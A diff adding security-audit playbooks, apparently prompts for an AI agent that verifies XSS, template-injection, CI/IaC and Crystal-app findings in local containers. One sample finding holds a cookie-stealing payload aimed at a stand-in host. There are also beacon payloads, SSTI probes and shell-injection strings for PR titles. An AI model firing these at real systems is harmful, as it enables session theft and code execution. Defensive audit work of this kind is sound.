+  Java HTML Sanitizer, Go `bluemonday` `UGCPolicy`/`StrictPolicy`. Effective
+  only if the config strips scripts/event handlers/`javascript:` URIs and is
+  applied on the path to the sink (check the actual policy, not just its
+  presence).
+- **SSTI guard:** the user value is passed as a **template variable / context
+  data**, never as template source, and the template file/name is a fixed
+  literal or chosen from a closed allowlist (not built from input). Logic-less
+  engines (Mustache, or Handlebars without helpers) rendering a *fixed* template
+  with user *data* are not SSTI.
+- **Value is provably non-HTML by type/validation before the sink:** strict
+  allowlist (enum, numeric cast, UUID/regex `^[\w-]+$` that excludes
+  `<>"'&`/backtick), or a URL validated to `http(s)` scheme with a real parser
+  before being put in `href`. A type that cannot carry markup (integer, bool,
+  enum) reaching an HTML sink is safe.
+- **CSP is NOT a substitute:** a `Content-Security-Policy` may reduce impact but
+  does not make an otherwise-injectable sink "not a finding" — only downgrade
+  severity if the CSP is strict (nonce/hash-based, no `unsafe-inline`,
+  no overly-broad host allowlist) AND verifiably served on the affected
+  response. Note it in `sanitizers_checked`; do not let it zero out a clear
+  injection.
+- **No untrusted source on the path:** the rendered value is a hardcoded
+  constant, an i18n string from a trusted bundle, or operator-set config — not
+  user/stored input.
+
+If a guard exists but is bypassable — wrong context (HTML-escaped value in a JS
+or URL context), permissive sanitizer config (allows `<script>`/`on*`/`href`
+javascript:), regex that misses an encoding, escaping applied *after* a `raw`/
+`html_safe` marking that already trusted the string — it is NOT a mitigation:
+flag it and name the bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — **SSTI with code execution** on the server (Jinja2/Twig/
+  FreeMarker/ERB/Velocity reaching `{{7*7}}`→RCE), OR unauthenticated **stored
+  XSS** on a high-traffic/authenticated surface that runs in victims' sessions
+  (admin panel, shared dashboard) enabling account/session takeover at scale.
+  Attacker controls markup with no effective escaping and no blocking CSP.
+- **High** — stored XSS requiring some auth/condition but hitting other users'
+  sessions (cookie/session theft, CSRF-token exfil, action-on-behalf), or
+  reflected XSS on an authenticated/sensitive page with a realistic delivery
+  vector and no strict CSP. Client-side SSTI (e.g. AngularJS sandbox escape) on
+  a real surface.
+- **Medium** — reflected XSS needing unlikely user interaction or a same-origin
+  precondition, XSS materially constrained by a partial CSP, self-XSS that
+  crosses a trust boundary only with effort, or an injectable sink behind a
+  permissive-but-not-trivial sanitizer.
+- **Low/Info** — output in a context where breakout is blocked by an effective
+  strict CSP plus context-correct partial encoding (residual risk only), or a
+  raw-HTML helper fed solely operator-controlled content (defense-in-depth
+  note, not a body finding).
+
+Stored XSS outranks reflected at equal reach (no delivery step, persistent,
+fires for every viewer) — note persistence in `rationale`. SSTI defaults to
+critical/high because it usually escalates beyond XSS to RCE/secret disclosure.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "xss-ssti-001",
+  "title": "Stored XSS via raw bio render in profile view",
+  "vuln_class": "xss-ssti",
+  "owasp": "A05:2025",
+  "cwe": "CWE-79",
+  "asvs": "V1/V3",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/views/profiles/show.html.erb",
+  "line": 14,
+  "end_line": 14,
+  "code_excerpt": "<div class=\"bio\"><%= raw @user.bio %></div>",
+  "source": "@user.bio — stored DB column set by the user via PATCH /profile (params[:user][:bio]), no server-side HTML stripping on write",
+  "sink": "ERB raw() — emits @user.bio as unescaped HTML into the response body",
+  "data_flow": "params[:user][:bio] -> User#bio (persisted, no sanitize on update) -> show.html.erb `raw @user.bio` -> HTML body; Rails auto-escaping explicitly defeated by raw()",
+  "sanitizers_checked": "raw() bypasses ERB auto-escape; no sanitize()/DOMPurify on write or read path; no allowlist on bio; no CSP header on this response (checked layouts/application.html.erb); rendered in HTML body context where <script>/<img onerror> execute",
+  "rationale": "Any authenticated user stores markup that executes in every viewer's session when the profile is opened — session/cookie theft, CSRF-token exfil. Same raw() pattern at profiles/show.html.erb:31 (signature field).",
+  "exploit_sketch": "PATCH /profile bio=<img src=x onerror=fetch('//atk/c?'+document.cookie)>; victim views /profiles/<id> -> payload fires in their session.",
+  "dynamic_poc_plan": "Save the payload via the profile form, open the profile as a second logged-in user, observe the OOB callback receiving that user's cookie/marker; confirms cross-user execution.",
+  "proposed_fix": "Render @user.bio through an escaped/sanitized path instead of treating it as trusted HTML, so stored user input can no longer execute as markup in viewers' sessions; the exact mechanism (default escaping vs. allowlist sanitizer for rich text) is for the implementer to choose."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces the variable source→sink, states the
+**output context** (HTML body / attribute / JS string / URL / template source),
+and names any encoder/sanitizer encountered and why it fails or is absent.
+`sanitizers_checked` is the §4 FP guard made explicit — list each relevant
+control (auto-escape state, encoder context-match, sanitizer policy, SSTI
+data-vs-source check, CSP) and state it is absent or name the exact bypass. A
+finding without an untrusted source reaching an interpreted sink is not a
+finding. Use `status:"likely"` for a proven static trace, `"confirmed"` only
+after dynamic repro, `"triage"` if reachability/source/context is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove attacker bytes are *interpreted* (script executes / template
+evaluates), not merely echoed as text. Pick the oracle by sub-class:
+
+1. **Reflected/DOM XSS — execution oracle:** send the payload via the affected
+   param/hash/header and confirm script *runs*, not just appears. Inert proof:
+   the response contains the raw, unescaped `<script>`/`onerror=` (grep the body
+   for the payload with angle brackets intact, not entity-encoded). Live proof:
+   drive a headless browser (Playwright/puppeteer) to the URL with a unique
+   beacon (`<img src=x onerror="fetch('http://<listener>/xss-<nonce>')">` or
+   `<script>navigator.sendBeacon('http://<listener>/<nonce>')</script>`) and
+   observe the listener receive the nonce — that proves DOM/script execution.
+   Try multiple contexts if entity-escaped: attribute breakout
+   (`" onmouseover=...`), JS-string breakout (`</script><script>...`),
+   `javascript:`/`data:` URI in `href`/`src`.
+2. **Stored XSS — cross-user execution oracle:** persist the beacon payload via
+   the write endpoint (as user A), then load the rendering page as a *second*
+   session/user (B) in a headless browser; confirm the listener receives the
+   beacon carrying B's context (e.g. B's cookie/marker). This proves persistence
+   + cross-user firing, the high-severity property.
+3. **SSTI — evaluation oracle:** send an engine-appropriate probe that an escaper
+   could not produce: arithmetic `{{7*7}}` / `${7*7}` / `#{7*7}` / `<%= 7*7 %>`
+   and confirm the response contains `49` (proves the template engine evaluated
+   input). Escalate cautiously to confirm reach: Jinja2 `{{config}}` or
+   `{{request.application.__globals__}}`, Twig `{{_self}}`,
+   FreeMarker `<#assign x="freemarker.template.utility.Execute"?new()>` — for the
+   PoC, demonstrate a benign capability (read a known config value or echo a
+   process marker) rather than running destructive commands. `49` in the
+   response from a `7*7` input is sufficient to set `reproduced:true`.
+
+For each, record the exact request/payload, the affected context, and the
+observed evidence in the `Repro` object (`reproduced`, `method:"live-exploit"`
+for browser-confirmed execution or SSTI eval, `"static-poc"` if only the raw
+unescaped reflection is shown without a browser, `poc`, `observed`, `impact`).
+If a CSP is present, note in `notes` whether it actually blocked execution in the
+headless run (a payload that reflects but is CSP-blocked is a weaker finding —
+reflect that in severity).
diff --git a/plugins/security/prompts/playbooks/ci-iac.md b/plugins/security/prompts/playbooks/ci-iac.md
new file mode 100644
index 0000000..c21d3ca
--- /dev/null
+++ b/plugins/security/prompts/playbooks/ci-iac.md
@@ -0,0 +1,400 @@
+# ENV Playbook — CI & Infrastructure-as-Code
+
+Reproduce a candidate finding in a CI / Infrastructure-as-Code target: GitHub
+Actions / Forgejo-Gitea / GitLab CI workflows, Terraform (`*.tf`), Kubernetes
+manifests, Helm charts, and Dockerfiles. **This stack is almost never run
+live** — there is no long-lived server to exploit with an HTTP request. The
+repro is overwhelmingly **static**: a line-referenced trace from an untrusted
+source (a fork PR title, an issue/comment body, a branch name) to a dangerous
+sink (a `run:` shell step, a privileged token, attacker-controlled checkout),
+backed by **actionlint / tfsec-trivy / hadolint / checkov** output and, where it
+adds fidelity, a **local containerized re-enactment** of the injected command.
+Keep ALL traffic and side effects inside a local container — no external hosts,
+no real credentials, no data exfiltration, and **never push to or call a real
+forge / cloud / registry**.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `CN=va-$FID` — container name. `IMG=va-$FID:repro` — image tag (only when a
+  Dockerfile is the finding's subject).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`. For this stack the
+  realistic outcomes are **`static-poc`** (the default — proven injection trace
+  + linter confirmation) and **`unit-test`** (re-enact the injected command in a
+  local container and observe its effect). `live-exploit` and `build-only` are
+  rare here and called out where they apply.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+# CI/CD workflow definitions (GitHub, Forgejo/Gitea, GitLab, others):
+ls -d .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null
+find . -maxdepth 3 \( -path '*/.github/workflows/*.y*ml' \
+  -o -path '*/.forgejo/workflows/*.y*ml' -o -path '*/.gitea/workflows/*.y*ml' \
+  -o -name 'action.y*ml' -o -name '.gitlab-ci.yml' -o -name 'Jenkinsfile' \
+  -o -path '*/.circleci/config.yml' -o -name 'azure-pipelines.yml' \) 2>/dev/null
+
+# Infrastructure-as-Code:
+find . -maxdepth 4 \( -name '*.tf' -o -name '*.tfvars' -o -name '*.hcl' \) 2>/dev/null | head
+ls Chart.yaml values.yaml kustomization.yaml 2>/dev/null
+find . -maxdepth 3 -name '*.y*ml' -exec grep -lE '^(apiVersion|kind):' {} \; 2>/dev/null | head  # k8s manifests
+find . -maxdepth 3 \( -name 'Dockerfile' -o -name 'Dockerfile.*' -o -name 'Containerfile' \) 2>/dev/null
+```
+
+Signals and what each means:
+
+- **`.github/workflows/*.yml|*.yaml`** → GitHub Actions. **`.forgejo/workflows/`
+  / `.gitea/workflows/`** → Forgejo/Gitea Actions: the *same* `${{ }}` expression
+  model, `uses:` action references, and trigger semantics as GHA. **`action.yml`**
+  at a repo root or under `actions/` → a composite/JS/Docker action (its own
+  injection surface). **`.gitlab-ci.yml` / `Jenkinsfile` / `.circleci/config.yml`
+  / `azure-pipelines.yml`** → other CI engines (different syntax, same root
+  cause: untrusted input concatenated into a shell).
+- **`*.tf` / `*.tfvars` / `*.hcl`** → Terraform / HCL. Look for provider blocks,
+  `local-exec`/`remote-exec` provisioners, and `templatefile`/`external` data
+  sources (command and template sinks).
+- **`apiVersion:`+`kind:` YAML, `Chart.yaml`, `kustomization.yaml`** → Kubernetes
+  manifests / Helm / Kustomize (RBAC, `securityContext`, `hostPath`, privileged
+  pods, secrets in plain manifests).
+- **`Dockerfile` / `Containerfile`** → image build (base-image pinning, `RUN
+  curl | sh`, secrets in layers, `USER root`).
+
+**The trust boundary is ground truth.** For CI-injection the only thing that
+matters is *which trigger runs the workflow and what data the attacker controls
+under that trigger*. Map it before anything else:
+
+```sh
+# Triggers that run with repo secrets/write token on attacker-influenced input:
+grep -rnE 'pull_request_target|workflow_run|issue_comment|pull_request_review' \
+  .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null
+
+# Untrusted event fields interpolated directly (the classic GHA script-injection):
+grep -rnE '\$\{\{[^}]*github\.event\.(pull_request\.(title|body|head\.(ref|label))|issue\.(title|body)|comment\.body|review\.body|head_commit\.message)' \
+  .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null
+
+# run: steps that contain a ${{ }} expression (expansion happens BEFORE the shell runs):
+grep -rnzoE 'run:[^\n]*\n([^\n]*\n)*?[^\n]*\$\{\{' \
+  .github/workflows 2>/dev/null
+
+# Token scope + attacker-controlled checkout (the dangerous combination):
+grep -rnE 'permissions:|write-all|contents: write|id-token: write|pull-requests: write|secrets\.' \
+  .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null
+grep -rnE 'actions/checkout.*|ref:\s*\$\{\{.*head' .github/workflows 2>/dev/null
+```
+
+If none of the workflow signals hold and the target is pure Terraform/k8s/Docker,
+the finding is a **misconfiguration**, not an injection — drive it through the
+linters (Section 3b/3c) and a static trace; there is nothing to "fire".
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is never
+touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare for this stack), `cp -a <target>
+/tmp/va-$FID` instead and note it. All linting/build/re-enactment steps below run
+from `WT=/tmp/va-$FID`.
+
+**Do not** run the workflow against the real forge, and **never** `git push`,
+`gh`/`fj` API calls, `terraform apply`, `kubectl apply`, or `docker push` from
+the worktree. The worktree is for reading and for feeding files into local
+linters and a local container — nothing that mutates remote state.
+
+---
+
+## 3. Build & run (docker-first)
+
+There is usually nothing to "run" — the deliverables are **linter evidence** and,
+for the highest-fidelity injection proof, a **local re-enactment** of the exact
+command the attacker's input would produce. All tools run as throwaway
+containers (host toolchain may be absent); pin a recent tag.
+
+### 3a. CI workflow linting — actionlint (GitHub/Forgejo/Gitea Actions)
+
+`actionlint` flags shell-injection-prone `${{ }}` interpolations in `run:` steps,
+plus syntax/expression errors. It is the primary automated confirmation for a
+CI-injection finding.
+
+```sh
+docker run --rm -v "$WT":/repo -w /repo rhysd/actionlint:latest \
+  -color -shellcheck= .github/workflows/*.y*ml 2>&1 | tee /tmp/va-$FID.actionlint
+# Forgejo/Gitea live under a different dir — point actionlint at them too:
+docker run --rm -v "$WT":/repo -w /repo rhysd/actionlint:latest \
+  -color .forgejo/workflows/*.y*ml .gitea/workflows/*.y*ml 2>&1 | tee -a /tmp/va-$FID.actionlint
+```
+
+The diagnostic to capture looks like:
+`property "..." is potentially untrusted ... avoid using it directly in inline
+scripts` — that line, with the file/line it points at, is the evidence that the
+sink is real.
+
+### 3b. Terraform / HCL — tfsec (via trivy) and validate
+
+```sh
+# Security scan (tfsec is now distributed inside trivy; both forms shown):
+docker run --rm -v "$WT":/src aquasec/trivy:latest config --severity HIGH,CRITICAL /src \
+  2>&1 | tee /tmp/va-$FID.tfsec
+# Legacy standalone tfsec image, if trivy is unavailable:
+docker run --rm -v "$WT":/src aquasec/tfsec:latest /src 2>&1 | tee -a /tmp/va-$FID.tfsec
+
+# Syntax/structure only (no provider creds, no apply, no remote state):
+docker run --rm -v "$WT":/src -w /src hashicorp/terraform:latest \
+  sh -c 'terraform init -backend=false -input=false && terraform validate' \
+  2>&1 | tee /tmp/va-$FID.tfvalidate
+```
+
+`-backend=false` and `validate` keep this offline — never `plan`/`apply` against
+a real backend or provider.
+
+### 3c. Dockerfile — hadolint; Kubernetes/Helm — checkov
+
+```sh
+docker run --rm -i hadolint/hadolint:latest < "$WT/Dockerfile" \
+  2>&1 | tee /tmp/va-$FID.hadolint
+
+# Broad IaC scanner covering k8s/Helm/Dockerfile/Terraform — good cross-check:
+docker run --rm -v "$WT":/src bridgecrew/checkov:latest -d /src --compact \
+  2>&1 | tee /tmp/va-$FID.checkov
+```
+
+### 3d. Local re-enactment of an injected command (highest-fidelity injection proof)
+
+When the finding is a `run:`-step script injection, the most convincing proof is
+to show that the attacker's input, once GHA substitutes it into the shell, runs
+an arbitrary command. Reconstruct the *exact* shell the runner would execute and
+run it in a disposable container — never on the host, never against the forge.
+
+Take the vulnerable step, e.g.:
+
+```yaml
+# .github/workflows/pr.yml  (trigger: pull_request_target)
+- run: echo "Title: ${{ github.event.pull_request.title }}"
+```
+
+The runner expands `${{ ... }}` *before* invoking bash, so a PR titled
+`a"; touch /tmp/va-pwned; echo "` yields the literal script below. Run that
+literal script in a clean container and observe the side effect:
+
+```sh
+INJECT='a"; touch /tmp/va-pwned-'$FID'; echo "'    # stands in for the PR title
+docker run --rm --name $CN -e TITLE_PoC="$INJECT" ubuntu:24.04 \
+  bash -c 'echo "Title: '"$INJECT"'"; ls -l /tmp/va-pwned-'"$FID"' 2>&1'
+```
+
+The reconstructed command must be derived faithfully from the workflow text
+(same quoting/shell the step uses); record both the rendered script and the
+observed side effect (the sentinel file, an `id`/`whoami`, an echoed marker).
+Side effects are benign sentinels only — never destructive, never networked.
+
+---
+
+## 4. Dependencies
+
+For this stack "dependencies" are the **actions, modules, images, and charts the
+build pulls in** — pinning and provenance, not a package install.
+
+- **Action / reusable-workflow refs** — list every `uses:` and whether it is
+  pinned to a 40-hex commit SHA (safe) or a mutable tag/branch
+  (`@v4`, `@main` — mutable, hijackable):
+
+  ```sh
+  grep -rnE 'uses:\s*\S+@' .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null \
+    | grep -vE '@[0-9a-f]{40}\b'      # what's left is unpinned → supply-chain surface
+  ```
+
+- **Terraform modules/providers** — registry `source` + `version` constraints,
+  git modules on a floating `?ref=` branch, and `.terraform.lock.hcl` (provider
+  hash pinning). Restore offline only, no network mutation:
+
+  ```sh
+  docker run --rm -v "$WT":/src -w /src hashicorp/terraform:latest \
+    terraform init -backend=false -input=false 2>&1 | tee /tmp/va-$FID.tfinit
+  ```
+
+- **Docker base images** — mutable tag (`:latest`, `:3`) vs digest pin
+  (`@sha256:...`); `grep -nE '^FROM ' "$WT/Dockerfile"`.
+- **Helm chart deps** — `Chart.yaml` `dependencies:` + `Chart.lock`.
+
+Do **not** upgrade/bump anything — that changes the audited input set. Honor the
+target's pins exactly; the *absence* of a pin is itself often the finding.
+
+---
+
+## 5. Run & health-check
+
+**Usually N/A** — there is no service to start and no port to probe. Skip
+straight to Fire the PoC (static trace + linter evidence). The "health check"
+for this stack is that the linters parsed the files and produced diagnostics:
+
+```sh
+grep -nEi 'untrusted|injection|error|warning|CRITICAL|HIGH' \
+  /tmp/va-$FID.actionlint /tmp/va-$FID.tfsec /tmp/va-$FID.hadolint \
+  /tmp/va-$FID.checkov 2>/dev/null
+```
+
+Rare live cases (and their ports) — only if the finding's impact genuinely
+requires a running artifact:
+
+- A Dockerfile whose *built image* contains the vulnerability (e.g. a baked-in
+  service with a flaw) — build and run it like any container target; common
+  ports follow the embedded app (8080/3000/80). Confirm up with
+  `curl -fsS http://127.0.0.1:$PORT/`.
+- A self-hosted CI runner image — out of scope to stand up a real runner; prefer
+  the Section 3d re-enactment instead.
+
+If you do build/run an image, bind host ports to `127.0.0.1` only.
+
+---
+
+## 6. Seed
+
+Minimal, synthetic, local-only. For this stack "seed" means *crafting the
+untrusted input the trigger would carry* — not creating users.
+
+- **CI script injection:** the seed is the malicious event payload string (PR
+  title/body, branch name, issue comment). Keep it as a benign sentinel-producing
+  payload, e.g. `x"; id > /tmp/va-$FID.out; echo "` or a branch named
+  `$(touch /tmp/va-$FID.b)`. You craft it as data and feed it to the local
+  re-enactment (Section 3d) — you do **not** open a real PR on a real forge.
+- **Workflow that needs files at specific paths:** create the minimal files the
+  step reads (e.g. an empty `dist/` or a one-line `version.txt`) inside `$WT` so
+  the reconstructed step doesn't fail for an unrelated reason.
+- **Terraform/k8s with required variables:** supply throwaway `*.tfvars` /
+  manifest values that satisfy `validate`/lint — never real account IDs, ARNs,
+  cluster endpoints, or tokens.
+
+Never reuse real secrets from the repo or environment.
+
+---
+
+## 7. Fire the PoC safely
+
+The "PoC" for CI-IaC is a **demonstrated source→sink**, not an HTTP request.
+Produce the strongest of these that the finding supports, keeping everything
+local:
+
+```sh
+# (A) PRIMARY — static injection proof: linter confirmation + the rendered shell.
+#     actionlint pins the untrusted property; show the line and the expansion.
+grep -nEi 'untrusted|injection' /tmp/va-$FID.actionlint
+# Then quote the workflow step and the rendered command (what bash actually runs)
+# for an attacker-chosen value of the event field — this is the static-poc body.
+
+# (B) HIGHER FIDELITY — re-enact the injected command in a throwaway container
+#     and capture the side effect (see Section 3d). Proves arbitrary execution:
+INJECT='x"; id > /tmp/va-'"$FID"'.out 2>&1; echo "'
+docker run --rm --name $CN ubuntu:24.04 \
+  bash -c 'echo "Title: '"$INJECT"'"; cat /tmp/va-'"$FID"'.out 2>&1'
+# Evidence = the `uid=0(root)` (or runner user) line: the title field executed code.
+
+# (C) TOKEN/ checkout abuse: show the dangerous trigger + write token + attacker
+#     checkout together. Evidence is the three grep'd lines that co-occur:
+grep -nE 'pull_request_target|workflow_run' .github/workflows/*.y*ml
+grep -nE 'contents: write|id-token: write|secrets\.|GITHUB_TOKEN' .github/workflows/*.y*ml
+grep -nE 'ref:\s*\$\{\{.*head|head\.sha|head\.ref' .github/workflows/*.y*ml
+# Explain the chain: untrusted code is checked out AND a privileged step runs it.
+
+# (D) Terraform command sink: local-exec / external with interpolated input.
+grep -rnE 'local-exec|remote-exec|"external"|templatefile\(' "$WT" --include='*.tf'
+# Evidence = tfsec/trivy finding ID + the line where attacker-influenceable input
+# reaches the provisioner command string.
+
+# (E) Dockerfile sink: pipe-to-shell install / unpinned base / baked secret.
+grep -nE 'curl .*\| *(sh|bash)|wget .*\| *(sh|bash)|^FROM .*:latest|ARG .*(TOKEN|SECRET|KEY)' \
+  "$WT/Dockerfile"
+# Evidence = hadolint rule (e.g. DL3008/DL4006/SC2086) + the offending line.
+```
+
+Evidence to record for the repro result:
+
+- The exact untrusted **source** (event field / module ref / base image) and the
+  **sink** (the `run:` shell, provisioner, RBAC grant), each with `file:line`
+  → `poc` + `data_flow`.
+- The proof artifact: the actionlint/tfsec/hadolint diagnostic line, and — when
+  you did the re-enactment — the captured command output / sentinel file
+  → `observed`.
+- What an attacker gains (CI RCE with the write-scoped `GITHUB_TOKEN` /
+  `secrets.*`, exfiltratable OIDC token, cluster privilege, etc.) → `impact`.
+
+Set the method honestly:
+
+- Re-enacted the injected command and observed execution → `method: unit-test`,
+  `reproduced: true`.
+- Linter + line-referenced source→sink trace, no live execution → `method:
+  static-poc`, `reproduced: false` (the expected default for this stack).
+
+Safety invariants: no real PR/issue/comment on any forge; no `push` / `apply` /
+`kubectl` / `docker push`; all command re-enactment stays inside a disposable
+local container with benign sentinels; no outbound connections to real hosts; no
+real secrets or cloud/forge credentials.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN 2>/dev/null
+docker image rm -f $IMG 2>/dev/null              # only if 3b/5 built one
+rm -f /tmp/va-$FID.actionlint /tmp/va-$FID.tfsec /tmp/va-$FID.tfvalidate \
+      /tmp/va-$FID.tfinit /tmp/va-$FID.hadolint /tmp/va-$FID.checkov \
+      /tmp/va-$FID.out /tmp/va-$FID-pwned* /tmp/va-$FID.b
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+For CI-IaC the *expected* outcome is already a static/test proof, so "fallback"
+mostly means choosing the right rung. Set `method` accordingly (enum:
+`live-exploit | unit-test | build-only | static-poc`).
+
+1. **Re-enactment ran (preferred for injection):** the reconstructed shell ran
+   in a local container and the side effect was observed (sentinel file, `id`
+   output, echoed marker). Set `method: unit-test`, `reproduced: true`. This is
+   the highest fidelity realistically available here.
+
+2. **Linter confirms + trace is airtight (the default):** actionlint flags the
+   untrusted property / tfsec or hadolint flags the sink, and you have a complete
+   `file:line` source→sink path with no effective guard (no
+   `if:`-gating to trusted actors, no expression moved to an `env:` + quoted
+   `"$VAR"` indirection, no minimal `permissions:`). Set `method: static-poc`,
+   `reproduced: false`. Cite the diagnostic line as evidence.
+
+3. **Linters unavailable / image can't be pulled (offline):** fall back to a
+   pure static PoC — quote the workflow/Terraform/Dockerfile lines, show the
+   attacker-controlled value, and render the exact command/config the sink
+   produces, explaining the guard analysis by hand. Set `method: static-poc`,
+   `reproduced: false`.
+
+4. **Dockerfile-built artifact whose runtime is the real subject:** if the
+   vulnerability only manifests in the *running* image, build it (Section 5) and,
+   if it serves, fire a real local request → `method: live-exploit`; if it builds
+   but can't start, record the build success + reachable trace → `method:
+   build-only`.
+
+Never claim `reproduced: true` without either observed runtime/command evidence
+or a linter diagnostic that directly names the sink; a hand trace alone is
+`static-poc` with `reproduced: false`. Prefer the highest-fidelity rung that
+actually works, and remember the guard check (trusted-actor `if:`, quoted-`env:`
+indirection, scoped `permissions:`) is what separates a real finding from noise.
diff --git a/plugins/security/prompts/playbooks/crystal.md b/plugins/security/prompts/playbooks/crystal.md
new file mode 100644
index 0000000..a81a206
--- /dev/null
+++ b/plugins/security/prompts/playbooks/crystal.md
@@ -0,0 +1,257 @@
+<!--
+ENV PLAYBOOK — crystal. You are the dynamic-verification (phase 6) agent. A
+candidate finding survived deep review + adversarial verify; your job is to
+BUILD, RUN, and EXPLOIT the target to reproduce it with a real PoC, then fill a
+Repro object (AGENTS.md). Docker-first: the native Crystal toolchain may be
+absent on the host, so prefer containerized build/run. Keep ALL traffic inside
+the local container/network — no external hosts, no real creds, no exfiltration.
+Emit Repro.method honestly: live-exploit > unit-test > build-only > static-poc.
+Be concrete; copy the commands. Replace {{ref}}, ports, and paths as detected.
+-->
+
+# Env Playbook — Crystal (`crystal`)
+
+**Stack key:** `crystal` · **Manifests:** `shard.yml` (+ `shard.lock`) ·
+**Sources:** `*.cr` · **Common web frameworks:** Kemal, Lucky, Amber, Grip,
+Athena · **Repro target:** a `Repro` object (`method`, `setup_commands`, `poc`,
+`observed`, `impact`).
+
+## 1. Detect — confirm the stack
+
+A repo is Crystal if recon found any of:
+
+```sh
+ls shard.yml shard.lock 2>/dev/null          # the manifest + lockfile
+find . -name '*.cr' -not -path './lib/*' | head   # first-party sources (skip vendored lib/)
+```
+
+Read `shard.yml` to pick the run strategy:
+
+- `targets:` → which binaries `crystal build` produces (`name` + `main` path).
+- `dependencies:` → web framework in play. Grep the keys: `kemal`, `lucky`,
+  `amber`, `grip`, `athena` decide the default port and start command below.
+- `crystal:` → required compiler version constraint; pin the base image to it.
+- A `Dockerfile` / `docker-compose.yml` / `compose.yaml` at the root → prefer it
+  (section 3). Vendored deps live in `lib/`; the cache key is `shard.lock`.
+
+If none of these are present this playbook does not apply — stop and report the
+mismatch rather than guessing.
+
+## 2. Isolate — work in a throwaway worktree at the target ref
+
+The verifier already runs under worktree isolation (`agent(..., {isolation:
+'worktree'})`); the original tree is untouched. Do NOT build in the source tree.
+
+If you must materialize a worktree yourself, branch from the target ref using a
+LOCAL ref (never `origin/<branch>`, which silently sets upstream):
+
+```sh
+git -C /path/to/target worktree add /tmp/vuln-crystal {{ref}}
+cd /tmp/vuln-crystal
+git rev-parse --short HEAD            # record in Repro.environment
+```
+
+Everything below runs inside this worktree. All build artifacts (`lib/`, `bin/`,
+the compiled binary) stay here and are discarded at teardown.
+
+## 3. Build & run — docker-first
+
+Crystal compiles to a static-ish native binary; you need the compiler image even
+if the host has no toolchain. Use the official `crystallang/crystal` image,
+pinned to the version from `shard.yml`'s `crystal:` key (fall back to `latest`).
+
+### 3a. If a Dockerfile / compose file exists — use it
+
+```sh
+# Compose, only if the plugin is present (opportunistic, not required):
+docker compose version >/dev/null 2>&1 && docker compose up --build -d
+
+# Otherwise the reliable path — plain docker build/run from the repo Dockerfile:
+docker build -t vuln-crystal:poc .
+docker run --rm -d --name vuln-crystal \
+  -p 127.0.0.1:3000:3000 vuln-crystal:poc
+```
+
+Bind to `127.0.0.1` only — never `0.0.0.0` on a shared host. Map the port the
+app actually listens on (section 5).
+
+### 3b. No Dockerfile — minimal generic image
+
+Build inside the official image and run the binary in the same container. One
+disposable container, source mounted read-write so `shards`/`crystal` can write
+`lib/` and `bin/`:
+
+```sh
+docker run --rm -d --name vuln-crystal \
+  -v "$PWD":/app -w /app \
+  -p 127.0.0.1:3000:3000 \
+  crystallang/crystal:latest \
+  sh -c 'shards install && crystal run src/<main>.cr'
+```
+
+Replace `src/<main>.cr` with the `targets.<name>.main` from `shard.yml` (Kemal
+apps are often `src/<app>.cr`; Lucky uses `crystal run src/start_server.cr`,
+Amber `crystal run src/<app>.cr`). For a faster, repeatable run, build once then
+exec:
+
+```sh
+docker run --rm -d --name vuln-crystal -v "$PWD":/app -w /app \
+  -p 127.0.0.1:3000:3000 crystallang/crystal:latest \
+  sh -c 'shards install && crystal build --release -o bin/app src/<main>.cr && exec bin/app'
+```
+
+Lucky/Amber may need Postgres. Stand up a private one and link it on a
+throwaway network — keep it container-local:
+
+```sh
+docker network create vulnnet 2>/dev/null || true
+docker run --rm -d --name vuln-db --network vulnnet \
+  -e POSTGRES_PASSWORD=poc -e POSTGRES_DB=app_development postgres:16-alpine
+# then add: --network vulnnet -e DATABASE_URL=postgres://postgres:poc@vuln-db/app_development
+```
+
+## 4. Dependencies — install / restore
+
+`shards` is the package manager (ships in the Crystal image). Inside the build
+container or via `docker run ... crystallang/crystal`:
+
+```sh
+shards install            # resolves & vendors into lib/ per shard.lock
+shards check              # verify installed deps match shard.lock
+```
+
+If `shard.lock` is present, `shards install` honors it (reproducible). Crystal's
+own stdlib needs no install. Native shards may need system libs (`libpq`,
+`libsqlite3`, `libyaml`, `openssl`); the official image carries the common ones,
+otherwise `apk add`/`apt-get install` the missing `-dev` package in the run cmd.
+
+## 5. Run & health-check
+
+Default ports by framework: **Kemal 3000**, **Lucky 5000** (`5001` boot env),
+**Amber 3000**, **Grip 3000**, **Athena 3000/8080**. Confirm the real bind in
+code: grep `Kemal.run`, `Kemal.config.port`, `Amber::Server`, `Lucky::Server`,
+or `HTTP::Server.new ... .listen(...)`.
+
+Confirm the app is up before firing the PoC:
+
+```sh
+docker logs vuln-crystal 2>&1 | tail -20          # look for "listening on .../3000"
+# poll until healthy (no foreground sleep; loop with a timeout):
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null http://127.0.0.1:3000/ && { echo up; break; }
+  [ "$i" = 30 ] && { echo "DOWN"; docker logs vuln-crystal | tail -40; }
+done
+```
+
